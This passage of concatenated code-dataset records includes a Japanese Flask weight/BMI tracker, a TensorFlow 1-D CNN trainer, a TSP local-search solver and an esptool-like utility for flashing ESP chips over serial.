os.path.join(current_dir, settings[\"png_file_name\"])\n\n# DBファイル準備\ndb_file = os.path.join(current_dir, settings[\"db_file\"])\n\n# DB管理クラスインスタンス化\ndb_util = com_db.DbUtil(db_file)\n\n# ロガー準備\nlog_filename = os.path.join(current_dir, settings[\"log_filename\"])\nhandler = get_handler(__name__, log_filename)\napp.logger.addHandler(handler)\napp.logger.setLevel(DEBUG)\napp.logger.info('start:' + dt_today.strftime('%Y/%m/%d %H:%M:%S'))\n\n@app.route('/', methods=['GET'])\ndef get_index():\n return get_list()\n\n@app.route('/list', methods=['GET','POST'])\ndef get_list():\n \"\"\"\n 一覧表示\n \"\"\"\n page = 1\n LIMIT = 15\n offset = 0\n before_day_flag = False\n next_day_flag = False\n if request.method == 'POST':\n page = int(request.form['page'])\n navi = request.form['navi']\n print(\"navi:\" + navi)\n if navi == 'before':\n page += 1\n else:\n page -= 1\n\n offset = page * LIMIT - LIMIT\n list = db_util.select_range(LIMIT, offset)\n\n # 操作ボタン制御\n dt_format = '%Y-%m-%d %H:%M:%S'\n dt_format_list = '%Y年%m月%d日 %H:%M'\n\n if len(list) > 0:\n str_newest_regist = db_util.select_newest_regist_datetime()\n dt_newest_regist = 
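The `CMD_ENTER_BOOT` branch above toggles DTR and RTS in a fixed sequence to drop the chip into its serial bootloader. A hedged sketch of that sequence with plain pyserial, assuming the classic ESP dev-board wiring (DTR drives IO0, RTS drives EN, both inverted); it needs real hardware on the port, so it is illustrative rather than testable, and the port name and delays are assumptions:

```python
import time
import serial

PORT = '/dev/ttyUSB0'      # assumption; adjust for your system

def enter_bootloader(port: str = PORT):
    with serial.Serial(port, 115200) as ser:
        ser.dtr = False    # IO0 = HIGH
        ser.rts = True     # EN = LOW, hold the chip in reset
        time.sleep(0.1)
        ser.dtr = True     # IO0 = LOW, request download mode
        ser.rts = False    # EN = HIGH, release reset
        time.sleep(0.05)
        ser.dtr = False    # IO0 back HIGH; the ROM loader is now waiting

if __name__ == '__main__':
    enter_bootloader()
```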
conv_str_to_datetime(str_newest_regist, dt_format)\n dt_list_max = conv_str_to_datetime(list[0].regist_datetime, dt_format_list)\n if dt_newest_regist <= dt_list_max:\n next_day_flag = False\n else:\n next_day_flag = True\n\n str_oldest_regist = db_util.select_oldest_regist_datetime()\n dt_oldest_regist = conv_str_to_datetime(str_oldest_regist, dt_format)\n dt_list_min = conv_str_to_datetime(list[-1].regist_datetime, dt_format_list)\n if dt_oldest_regist >= dt_list_min:\n before_day_flag = False\n else:\n before_day_flag = True\n\n return render_template('web_health_list.html', list=list, page=page\n , before_day_flag=before_day_flag, next_day_flag=next_day_flag)\n\n@app.route('/detail/', methods=['GET'])\ndef get_detail(id):\n \"\"\"\n 詳細表示\n \"\"\"\n health = db_util.select_by_key(id)\n return render_template('web_health_detail.html', health=health)\n\n@app.route('/new', methods=['GET'])\ndef new():\n \"\"\"\n 新規登録画面へ遷移\n \"\"\"\n str_regist = datetime.datetime.today().strftime('%Y-%m-%dT%H:%M')\n return render_template('web_health_new.html', regist_datetime=str_regist, health=health, height=height)\n\n@app.route('/save', methods=['POST'])\ndef save():\n \"\"\"\n 新規登録\n \"\"\"\n if request.method == 'POST':\n # 前回最新データ取得\n before_data = db_util.select_by_key(db_util.select_max_id())\n before = before_data.weight\n\n # 登録\n health = new_health(request)\n db_util.save(health)\n new_data = db_util.select_by_key(db_util.select_max_seq(\"health\"))\n health = db_util.select_by_key(new_data.data_id)\n\n # 結果を取得\n result_list = com_health.get_result_list(health.height, health.weight, target_weight, before)\n\n return render_template('web_health_new.html', health=health, result_list=result_list)\n\ndef new_health(request):\n \"\"\"\n 新しいレコードを作成\n \"\"\"\n data_id = 0\n dt_regist = dt.strptime(request.form['regist_datetime'], '%Y-%m-%dT%H:%M') if 'regist_datetime' in request.form else datetime.datetime.today()\n weight = request.form['weight'] if 'weight' in request.form else 0.0\n weight = jaconv.z2h(weight, kana=False, ascii=True, digit=True)\n\n # BMIを計算\n bmi = com_health.calc_bmi(float(height), float(weight))\n\n # インスタンス生成\n return com_db.Health(data_id, dt_regist, height, weight, bmi)\n\n@app.route('/edit/', methods=['GET'])\ndef edit(id):\n \"\"\"\n 編集表示\n \"\"\"\n health = db_util.select_by_key(id)\n dt_regist = dt.strptime(health.regist_datetime, '%Y年%m月%d日 %H:%M')\n health.regist_datetime = dt_regist.strftime('%Y-%m-%dT%H:%M')\n return render_template('web_health_edit.html', health=health)\n\n@app.route('/update', methods=['POST'])\ndef update():\n \"\"\"\n 更新\n \"\"\"\n if request.method == 'POST':\n # 更新\n data_id = request.form['data_id']\n dt_regist = dt.strptime(request.form['regist_datetime'], '%Y-%m-%dT%H:%M')\n height = request.form['height']\n weight = request.form['weight']\n weight = jaconv.z2h(weight, kana=False, ascii=True, digit=True)\n\n # BMIを再度計算\n bmi = com_health.calc_bmi(float(height), float(weight))\n\n health = com_db.Health(data_id, dt_regist, height, weight, bmi)\n db_util.update(health)\n health = db_util.select_by_key(data_id)\n return render_template('web_health_detail.html', health=health, done_flg=1)\n\n@app.route('/delete/', methods=['GET'])\ndef delete(id):\n \"\"\"\n 削除\n \"\"\"\n db_util.delete_by_key(id)\n return get_list()\n\n@app.route('/navi', methods=['POST'])\ndef navi():\n \"\"\"\n グラフ画面・前へ/次へ\n \"\"\"\n if request.method == 'POST':\n to_date = request.form['to_date']\n navi = request.form['navi']\n\n if navi == 'before_day':\n rd = 
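`new_health` runs user input through `jaconv.z2h(..., ascii=True, digit=True)` so weights typed with full-width characters still parse. A standard-library stand-in for that normalization step (`jaconv` does more, e.g. kana handling; this covers only digits and the decimal point):

```python
# Map full-width digits and the full-width dot to ASCII before float().
Z2H = str.maketrans('０１２３４５６７８９．', '0123456789.')

for raw in ('６５.５', '65.5', '７２．０'):
    print(raw, '->', float(raw.translate(Z2H)))
```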
relativedelta(days=-1)\n elif navi == 'before_month':\n rd = relativedelta(months=-1)\n elif navi == 'next_month':\n rd = relativedelta(months=1)\n else:\n rd = relativedelta(days=1)\n\n dt_to_date = dt.strptime(to_date, '%Y-%m-%d') + rd\n dt_from_date = get_one_month_before(dt_to_date)\n\n # グラフ画面へ遷移\n return disp_graph(dt_from_date, dt_to_date)\n\n@app.route('/graph', methods=['GET', 'POST'])\ndef graph():\n \"\"\"\n グラフ画面へ遷移\n \"\"\"\n if request.method == 'POST':\n dt_from_date = dt.strptime(request.form['from_date'], '%Y-%m-%d')\n dt_to_date = dt.strptime(request.form['to_date'], '%Y-%m-%d') \n else:\n str_newest_regist = db_util.select_newest_regist_datetime()\n dt_to_date = conv_str_to_datetime(str_newest_regist, '%Y-%m-%d %H:%M:%S')\n dt_from_date = get_one_month_before(dt_to_date)\n\n # グラフ画面へ遷移\n return disp_graph(dt_from_date, dt_to_date)\n\ndef disp_graph(dt_from_date, dt_to_date):\n \"\"\"\n グラフ画面へ遷移\n \"\"\"\n from_date = dt_from_date.strftime('%Y-%m-%d')\n to_date = dt_to_date.strftime('%Y-%m-%d')\n data = db_util.select_for_graph(from_date, to_date)\n title = db_util.get_disp_min_max_avg(from_date, to_date)\n graph_data = com_health.save_graph(data, title, png_file_name, target_weight)\n\n # 操作ボタン制御\n dt_format = '%Y-%m-%d'\n str_newest_regist = db_util.select_newest_regist_datetime()\n date_newest_regist = conv_str_to_date(str_newest_regist, dt_format)\n date_to_date = conv_str_to_date(to_date, dt_format)\n if date_newest_regist > date_to_date:\n next_day_flag = True\n next_month_flag = True\n else:\n next_day_flag = False\n next_month_flag = False\n\n str_oldest_regist = db_util.select_oldest_regist_datetime()\n date_oldest_regist = conv_str_to_date(str_oldest_regist, dt_format)\n date_from_date = conv_str_to_date(from_date, dt_format)\n if date_oldest_regist < date_from_date:\n before_day_flag = True\n before_month_flag = True\n else:\n before_day_flag = False\n before_month_flag = False\n\n # グラフ画面へ遷移\n return render_template('web_health_graph.html', graph_data=graph_data\n , from_date=from_date, to_date=to_date\n , before_day_flag=before_day_flag, next_day_flag=next_day_flag\n , before_month_flag=before_month_flag, next_month_flag=next_month_flag)\n","sub_path":"06_DB操作系/健康管理_Docker/healthcare/web_health_manage.py","file_name":"web_health_manage.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"544260943","text":"import pandas as pd\nimport glob\n\n\npasta = \"Relatórios/Todos os alunos/\" # pasta onde estão os arquivos .csv\narquivos = [f for f in glob.glob(str(pasta) + \"*.csv\", recursive=True)] # cria um array com o endereço e nome dos arquivos\ndf_final = pd.DataFrame() # inicia o dataframe final\n\nfor f in arquivos:\n arquivo = pd.read_csv(f, header=None) # se os arquivos não tiverem cabeçalhos, é necessário header=None\n df_temp = pd.DataFrame(arquivo) # cria um dataframe temporário com o arquivo atual\n df_final = pd.concat([df_final, df_temp]) # concatena no dataframe final\n\nprint(df_final.head(10))\n\ndf_final = df_final.replace('\\n ','', regex=True) # corrige as quebras de linha no campo 'cidade de origem'\ndf_final.to_csv(\"Resultados/csv_final.csv\", index=False, encoding=\"cp1252\") # salva o arquivo na pasta Resultados;\n # o encoding 'cp1252' foi necessário para tratar alguns caracteres que o 'latin-1' não 
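The `navi` handler shifts the graph window by whole days or months with `relativedelta`, then rebuilds the start of the window one month before the end. The arithmetic in isolation (the inline month subtraction stands in for `util.dateUtil.get_one_month_before`, whose source is not included here):

```python
from datetime import datetime
from dateutil.relativedelta import relativedelta

def shift_window(to_date: datetime, navi: str):
    step = {'before_day': relativedelta(days=-1),
            'before_month': relativedelta(months=-1),
            'next_month': relativedelta(months=1),
            'next_day': relativedelta(days=1)}[navi]
    new_to = to_date + step
    return new_to + relativedelta(months=-1), new_to   # (from, to)

frm, to = shift_window(datetime(2024, 3, 31), 'next_day')
print(frm.date(), '->', to.date())   # 2024-03-01 -> 2024-04-01
```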
reconhecia","sub_path":"ds.py","file_name":"ds.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"129734565","text":"N = int(input())\ndef make_divisors(n):\n divisors = []\n for i in range(1, int(n**0.5)+1):\n if n % i == 0:\n divisors.append(i)\n #if i != n // i:\n divisors.append(n//i)\n\n divisors.sort()\n return divisors\ndiv_lst = make_divisors(N)\nlen_div = len(div_lst)\nans = float(\"inf\")\nfor i in range(len_div):\n tmp_ans = max(len(str(div_lst[i])) , len(str(div_lst[len_div - i - 1])))\n if ans > tmp_ans:\n\n ans = tmp_ans\nprint(ans)","sub_path":"ABC/57/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"651185001","text":"import numpy\nimport tensorflow\nimport pandas\nimport argparse\nimport sys\nsys.path.append(\"..\")\nimport preprocess_data\n\ntensorflow.contrib.eager.enable_eager_execution()\n\nflag = None\nparser = argparse.ArgumentParser()\nparser.add_argument('--device', default='/cpu:0')\nparser.add_argument('--summary_dir', default='summary/')\nparser.add_argument('--model_dir', default='model/')\nparser.add_argument('--batch_size', default=900)\nparser.add_argument('--max_iteration', default=3000)\nparser.add_argument('--max_learning_rate', default=0.01)\nparser.add_argument('--min_learning_rate', default=0.0001)\nparser.add_argument('--input_dimension', default=[None,92,1])\nparser.add_argument('--cnn1_dimension', default=[9,1,16])\nparser.add_argument('--cnn2_dimension', default=[7,16,32])\nparser.add_argument('--cnn3_dimension', default=[5,32,64])\nparser.add_argument('--cnn4_dimension', default=[3,64,32])\nparser.add_argument('--fc5_dimension', default=16)\nparser.add_argument('--output_dimension', default=2)\nparser.add_argument('--keep_prob', default=0.8)\nflag, unparsed = parser.parse_known_args()\n\ntrain_x, train_y, test_x, test_y = preprocess_data.suit_1d(12)\n\nwith tensorflow.device(flag.device):\n w1 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn1_dimension, stddev=0.1), name='w1')\n b1 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn1_dimension[2]), name='b1')\n w2 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn2_dimension, stddev=0.1), name='w2')\n b2 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn2_dimension[2]), name='b2')\n w3 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn3_dimension, stddev=0.1), name='w3')\n b3 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn3_dimension[2]), name='b3')\n w4 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn4_dimension, stddev=0.1), name='w4')\n b4 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn4_dimension[2]), name='b4')\n w5 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal((96, flag.fc5_dimension), stddev=0.1), name='w5')\n b5 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.fc5_dimension), name='b5')\n w6 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal((flag.fc5_dimension, flag.output_dimension), stddev=0.1), name='w6')\n b6 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.output_dimension), name='b6')\n\ndef model(x, is_train):\n h1 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(x, w1, stride=2, 
padding='VALID') + b1)\n #h1 = tensorflow.reshape(h1,(-1,1,139,16))\n #h1 = tensorflow.nn.max_pool(h1, [1,1,2,1], [1,1,2,1], 'VALID')\n #h1 = tensorflow.reshape(h1,(-1,74,16))\n\n h2 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(h1, w2, stride=2, padding='VALID') + b2)\n #h2 = tensorflow.reshape(h2,(-1,1,74,32))\n #h2 = tensorflow.nn.max_pool(h2, [1,1,2,1], [1,1,2,1], 'VALID')\n #h2 = tensorflow.reshape(h2,(-1,37,32))\n\n h3 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(h2, w3, stride=2, padding='VALID') + b3)\n #h3 = tensorflow.reshape(h3,(-1,1,37,64))\n #h3 = tensorflow.nn.max_pool(h3, [1,1,2,1], [1,1,2,1], 'VALID')\n #h3 = tensorflow.reshape(h3,(-1,19,64))\n\n h4 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(h3, w4, stride=2, padding='VALID') + b4)\n #h4 = tensorflow.reshape(h4,(-1,1,19,32))\n #h4 = tensorflow.nn.max_pool(h4, [1,1,2,1], [1,1,2,1], 'VALID')\n #h4 = tensorflow.reshape(h4,(-1,10,32))\n h4 = tensorflow.reshape(h4, (x.shape[0], -1))\n\n h5 = tensorflow.nn.leaky_relu(tensorflow.matmul(h4, w5) + b5)\n h5 = tensorflow.contrib.layers.dropout(h5, flag.keep_prob, is_training=is_train)\n\n out = tensorflow.matmul(h5, w6) + b6\n\n return out\n\n@tensorflow.contrib.eager.implicit_value_and_gradients\ndef loss_fun(x, y_, is_train):\n y = model(x, is_train)\n loss = tensorflow.reduce_mean(tensorflow.nn.softmax_cross_entropy_with_logits_v2(labels=y_, logits=y))\n return loss\n\ndef score(x, y_, is_train):\n y = model(x, is_train)\n accuracy = tensorflow.reduce_mean(tensorflow.cast(tensorflow.equal(tensorflow.argmax(y, 1), tensorflow.argmax(y_, 1)), tensorflow.float32))\n return accuracy\n\ndef main(_):\n optimizer = tensorflow.train.AdamOptimizer()\n best_score=0\n\n with tensorflow.device(flag.device):\n num = train_x.shape[0] // flag.batch_size\n for i in range(flag.max_iteration):\n x = train_x[i % num * flag.batch_size:i % num * flag.batch_size + flag.batch_size,:]\n y_ = train_y[i % num * flag.batch_size:i % num * flag.batch_size + flag.batch_size,:]\n learning_rate = flag.max_learning_rate - (flag.max_learning_rate - flag.min_learning_rate) * (i / flag.max_iteration)\n optimizer._lr = learning_rate\n loss, gradient = loss_fun(x, y_, True)\n optimizer.apply_gradients(gradient)\n print(\"step: {} loss: {}\".format(i, loss.numpy()))\n if i % 10 == 0:\n accuracy = score(x, y_, False)\n print(\"step: {} train accuracy: {}\".format(i, accuracy.numpy()))\n if i % 100 == 0:\n accuracy = score(test_x, test_y, False)\n print(\"step: {} test accuracy: {}\".format(i, accuracy.numpy()))\n if accuracy.numpy()>best_score:\n best_score=accuracy.numpy()\n\n print(\"test accuracy: {}\".format(best_score))\n\n Saver = tensorflow.contrib.eager.Saver([w1, w2, w3, w4, w5, w6, b1, b2, b3, b4, b5, b6])\n Saver.save(flag.model_dir + 'cnn_1d')\n\nif __name__ == '__main__':\n tensorflow.app.run(main=main, argv=[sys.argv[0]] + unparsed)","sub_path":"train_suit/cnn_1d.py","file_name":"cnn_1d.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5778992","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport time\n\nKROA200_FILENAME =\"kroA200.tsp\"\nKROB200_FILENAME =\"kroB200.tsp\"\n\nclass TSP:\n def __init__(self,filename):\n self.nodes = self.readTSP(filename)\n self.dst_matrix_sorted, self.dst_matrix = self.create_dst_matrix()\n\n def readTSP(self,filename):\n nodelist = []\n with open(filename,'r') as file:\n # Read header\n file.readline()# NAME\n file.readline() # TYPE\n 
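Each conv layer in `cnn_1d.py` uses `stride=2` with `VALID` padding, so the sequence length shrinks as `floor((L - k) / s) + 1` per layer; that is where the hard-coded `96` in `w5` comes from. A quick check of the arithmetic:

```python
def valid_out(length: int, kernel: int, stride: int = 2) -> int:
    # Output length of a VALID-padded 1-D convolution.
    return (length - kernel) // stride + 1

length = 92                                  # input_dimension above
for kernel, channels in [(9, 16), (7, 32), (5, 64), (3, 32)]:
    length = valid_out(length, kernel)
    print(f"after k={kernel}: length={length}, channels={channels}")
print("flattened features:", length * 32)    # 3 * 32 = 96, matching w5
```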
file.readline() # COMMENT\n dimension = file.readline().strip().split()[1] # DIMENSION\n file.readline() # EDGE_WEIGHT_TYPE\n file.readline()\n\n # Read node list\n N = int(dimension)\n for i in range(0, int(dimension)):\n x,y = file.readline().strip().split()[1:]\n nodelist.append([int(x), int(y)])\n\n # Close input file\n\n return nodelist\n\n def count_dist(self,v, u):\n return np.sqrt(((v[0] - u[0]) ** 2)+((v[1] - u[1]) ** 2))\n\n def create_dst_matrix(self):\n dst_matrix_sorted = []\n dst_matrix = []\n for i in range(len(self.nodes)):\n dst_matrix_sorted.append([])\n dst_matrix.append([])\n for j in range(len(self.nodes)):\n dst_matrix_sorted[i].append([self.count_dist(self.nodes[i],self.nodes[j]),j])\n #nearest \n dst_matrix[i].append(dst_matrix_sorted[i].copy())\n dst_matrix_sorted[i].sort()\n return dst_matrix_sorted ,dst_matrix\n\n def rest_nodes(self, cycle):\n nodes =[]\n for i in range(len(self.nodes)):\n if i not in cycle:\n nodes.append(i)\n return nodes\n \n def group_nodes(self,first,second):\n dst = []\n for node in range(len(self.dst_matrix_sorted[0])):\n if node != first and node != second:\n dst1 = self.dst_matrix[node][0][first][0]\n dst2 = self.dst_matrix[node][0][second][0]\n dst.append((node,dst1/dst2))\n dst.sort(key=lambda x: x[1])\n\n return [first]+[p[0] for p in dst[:round(len(dst)/2)]], [second]+[p[0] for p in dst[round(len(dst)/2):]]\n \n def min_index_value(self,indexes, node_neighbors,cluster):\n index = 1 \n \n while node_neighbors[index][1] in indexes or node_neighbors[index][1] not in cluster:\n index +=1\n return node_neighbors[index][1] , node_neighbors[index][0]\n\n def lowest_cost(self,cycle,cluster):\n candidat_lowest = []\n \n for i in range(len(cluster)):\n if cluster[i] not in cycle:\n tmp_lowest = []\n for j in range(-1,len(cycle)-1):\n old_edge = self.dst_matrix[cycle[j]][0][cycle[j+1]][0]\n new_edge_1 =self.dst_matrix[cycle[j]][0][cluster[i]][0]\n new_edge_2 = self.dst_matrix[cluster[i]][0][cycle[j+1]][0]\n tmp_lowest.append([new_edge_1+new_edge_2-old_edge,j+1])\n tmp_lowest.sort(key=lambda x : x[0])\n candidat_lowest.append([tmp_lowest[0][0],tmp_lowest[0][1],cluster[i]])\n \n candidat_lowest.sort(key=lambda x : x[0])\n return candidat_lowest[0][1], candidat_lowest[0][2]\n\n def count_new_dist(self,cycle):\n new_dst = []\n for i in range(-1,len(cycle)-1):\n new_dst.append(self.dst_matrix[ cycle[i] ][0][ cycle[i+1] ][0])\n return new_dst\n\n def cycle_expansion_execute(self,cycle,cluster,size):\n while len(cycle) < size:\n index, point = self.lowest_cost(cycle,cluster)\n cycle.insert(index,point)\n\n return cycle\n\n def cycle_expansion(self,first,second):\n length = len(self.dst_matrix_sorted[0])\n size = length//2\n\n first_cycle = first\n second_cycle = second\n \n\n first_cycle = self.cycle_expansion_execute(first_cycle,self.rest_nodes(second_cycle),size)\n second_cycle = self.cycle_expansion_execute(second_cycle,self.rest_nodes(first_cycle),length-size)\n \n return [first_cycle, second_cycle]\n \n def get_random_sol(self):\n length = len(self.dst_matrix_sorted[0])\n first_cycle = random.sample(range(0, length), length//2)\n second_cycle = [x for x in range(0,length) if x not in first_cycle]\n return [first_cycle,second_cycle]\n\n def draw_lines(self,indexes):\n if indexes:\n x_cords =[]\n y_cords=[]\n for i in indexes:\n x_cords.append(self.nodes[i][0])\n y_cords.append(self.nodes[i][1])\n\n x_cords.append(x_cords[0])\n y_cords.append(y_cords[0])\n plt.plot(x_cords,y_cords) \n\n def save_fig(self, indexes,filename='a'):\n nodess = 
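`lowest_cost`/`cycle_expansion` above implement cheapest insertion: for each unvisited city, find the tour edge whose replacement by the two new edges costs the least. The core step, self-contained (Euclidean points instead of the precomputed distance matrix):

```python
# Cheapest-insertion step, mirroring TSP.lowest_cost above.
from math import dist

def cheapest_insertion(cycle, candidates, pts):
    best = None   # (cost_delta, insert_index, city)
    for c in candidates:
        for j in range(len(cycle)):
            a, b = cycle[j - 1], cycle[j]
            delta = dist(pts[a], pts[c]) + dist(pts[c], pts[b]) - dist(pts[a], pts[b])
            if best is None or delta < best[0]:
                best = (delta, j, c)
    return best

pts = [(0, 0), (10, 0), (10, 10), (0, 10), (5, 1)]
cycle = [0, 1, 2, 3]
delta, j, c = cheapest_insertion(cycle, [4], pts)
cycle.insert(j, c)
print(f"inserted city {c} at {j}, extra length {delta:.2f} ->", cycle)
```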
np.array(self.nodes)\n plt.scatter(nodess[:,0],nodess[:,1])\n self.draw_lines(indexes[0])\n self.draw_lines(indexes[1])\n plt.savefig(filename+'.jpg')\n plt.close()\n\nclass LocalSearch():\n def __init__(self,cycles,nodes,dst_matrix,dst_matrix_sorted,solver):\n self.first , self.second = cycles\n self.nodes = nodes\n self.dst_matrix_sorted = dst_matrix_sorted\n self.dst_matrix = dst_matrix\n self.solver = solver\n self.candidats = []\n def count_candidats(self):\n size = 10\n for i in range(len(self.nodes)):\n self.candidats.append([])\n for j in range(size):\n \n \n self.candidats[i].append(self.dst_matrix_sorted[i][1:size+1][j][1])\n\n def count_dst(self, x ,s1 ,s2):\n \n return self.dst_matrix[x][0][s1][0] + self.dst_matrix[x][0][s2][0]\n\n def count_change(self,x,xs1,xs2,y,ys1,ys2):\n\n \n old_x = self.count_dst(x,xs1,xs2)\n old_y = self.count_dst(y,ys1,ys2)\n if x == ys1:\n ys1 = y\n xs2 = x\n if y == xs1:\n xs1 = x\n ys2 = y\n \n new_x = self.count_dst(x,ys1,ys2)\n new_y = self.count_dst(y,xs1,xs2)\n \n \n return (new_x+new_y) - (old_x+old_y) \n def count_dst_edge(self,x,s1):\n return self.dst_matrix[x][0][s1][0]\n\n def count_change_edge(self,x,xs1,y,ys1):\n old_x = self.count_dst_edge(x,xs1)\n old_y = self.count_dst_edge(y,ys1)\n new_x = self.count_dst_edge(x,ys1)\n new_y = self.count_dst_edge(y,xs1)\n return (new_x+new_y) - (old_x+old_y) \n def revers(self,begin,end,which):\n if which==1:\n tmp = self.first.copy()\n for i in range(end-1,begin,-1):\n \n self.first[begin+(end-i)] = tmp[i]\n else:\n \n tmp = self.second.copy()\n for i in range(end-1,begin,-1):\n self.second[begin+(end-i)] = tmp[i]\n \n def steepest_list(self):\n def inner():\n moves=[]\n length = len(self.first)\n best =0\n for i in range(length):\n for j in range(i+2,length):\n current = self.count_change_edge(self.first[i],self.first[(i+1)%length],self.first[j],self.first[(j-1)%length])\n if current <0:\n if current1):\n return self.count_change_edge(self.first[mini],self.first[(mini+1)%len(self.first)],self.first[maxi],self.first[(maxi-1)%len(self.first)])\n else:\n return 1\n elif x_cycle==2 and y_cycle ==2:\n if (maxi-mini >1):\n return self.count_change_edge(self.second[mini],self.second[(mini+1)%len(self.second)],self.second[maxi],self.second[(maxi-1)%len(self.second)])\n else:\n return 1\n else:\n if x_cycle == 1:\n return self.count_change(self.first[index_x],self.first[index_x-1],self.first[(index_x+1)%len(self.first)],self.second[index_y],self.second[index_y-1],self.second[(index_y+1)%len(self.second)])\n else:\n return self.count_change(self.second[index_x],self.second[index_x-1],self.second[(index_x+1)%len(self.second)],self.first[index_y],self.first[index_y-1],self.first[(index_y+1)%len(self.first)])\n def check_if_is_not_in_moves(move,x,y):\n for i in range(len(move)):\n if (moves[i][1]==x and moves[i][2]==y) or (moves[i][2]==x and moves[i][1]==y):\n return False\n return True\n def count_new_values(moves,x,y,types):\n \n if types == 0:\n a,b=0,0\n length = len (self.first)\n for i in [self.first.index(x),self.first.index(y)]:\n for j in range(length): \n if abs(j-i)>1:\n a = min(i,j)\n b = max(i,j)\n current = self.count_change_edge(self.first[a],self.first[(a+1)%length],self.first[b],self.first[(b-1)%length])\n if current <0:\n if self.first[a] < self.first[b]:\n moves.append((current,self.first[a],self.first[b]))\n else:\n moves.append((current,self.first[b],self.first[a]))\n current = 
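`count_change_edge` prices a 2-opt move: drop edges (x, xs1) and (y, ys1), add (x, ys1) and (y, xs1); `revers` then flips the segment in between, whose internal length is unchanged for a symmetric distance. The delta in isolation, checked against a full tour-length recomputation:

```python
from math import dist

def tour_len(pts, cycle):
    return sum(dist(pts[cycle[k - 1]], pts[cycle[k]]) for k in range(len(cycle)))

def two_opt_delta(pts, cycle, i, j):
    # Removes edges (v_i, v_{i+1}) and (v_j, v_{j-1}), adds (v_i, v_{j-1})
    # and (v_j, v_{i+1}) -- the same bookkeeping as count_change_edge above.
    n = len(cycle)
    x, xs1 = pts[cycle[i]], pts[cycle[(i + 1) % n]]
    y, ys1 = pts[cycle[j]], pts[cycle[(j - 1) % n]]
    return (dist(x, ys1) + dist(y, xs1)) - (dist(x, xs1) + dist(y, ys1))

pts = [(0, 0), (10, 0), (10, 10), (0, 10)]
cycle = [0, 2, 1, 3]                 # crossing tour
delta = two_opt_delta(pts, cycle, 0, 3)
before = tour_len(pts, cycle)
cycle[1:3] = reversed(cycle[1:3])    # apply the move: reverse positions 1..2
assert abs(tour_len(pts, cycle) - before - delta) < 1e-9
print(f"improvement: {delta:.2f}")   # negative: uncrossing shortens the tour
```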
self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if types == 1:\n length = len (self.second)\n for i in [self.second.index(x),self.second.index(y)]:\n \n for j in range(length):\n if abs(j-i)>1:\n current = self.count_change_edge(self.second[i],self.second[(i+1)%length],self.second[j],self.second[(j-1)%length])\n if current <0:\n if self.second[i] < self.second[j]:\n moves.append((current,self.second[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.second[i]))\n current = self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if types ==2:\n \n try:\n i = self.first.index(x)\n length = len (self.second)\n for j in range(length):\n \n current = self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if abs(j-i)>1:\n a = min(i,j)\n b = max(i,j)\n current = self.count_change_edge(self.first[a],self.first[(a+1)%length],self.first[b],self.first[(b-1)%length])\n if current <0:\n if self.first[a] < self.first[b]:\n moves.append((current,self.first[a],self.first[b]))\n else:\n moves.append((current,self.first[b],self.first[a]))\n except:\n pass\n try:\n j = self.second.index(y)\n length = len (self.first)\n for i in range(length):\n \n current = self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if abs(j-i)>1:\n current = self.count_change_edge(self.second[i],self.second[(i+1)%length],self.second[j],self.second[(j-1)%length])\n if current <0:\n if self.second[i] < self.second[j]:\n moves.append((current,self.second[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.second[i]))\n except:\n pass\n return moves\n\n def update_moves(moves,x,y,types=0):\n k = 0\n \n \n moves = count_new_values(moves,x,y,types)\n \n \n while k time.time() :\n # wybór rodziców (hae_1 jako rozwiazanie wyjsciowe)\n \n \n one = random.randint(0,hae_len-1)\n while True:\n two = random.randint(0,hae_len-1)\n if two != one:\n break\n hae_1, hae_2 = hae[one],hae[two]\n hae_cand = hae_1.copy()\n # usuwanie niepowatarzajacych sie krawędzie\n for h in range(2):\n for i in range(len(hae_cand[0])):\n for j in range(len(hae_2[0])):\n\n if hae_cand[h][i] == hae_2[0][j]:\n if hae_cand[h][(i+1)%leng] != hae_2[0][(j-1)%leng] and 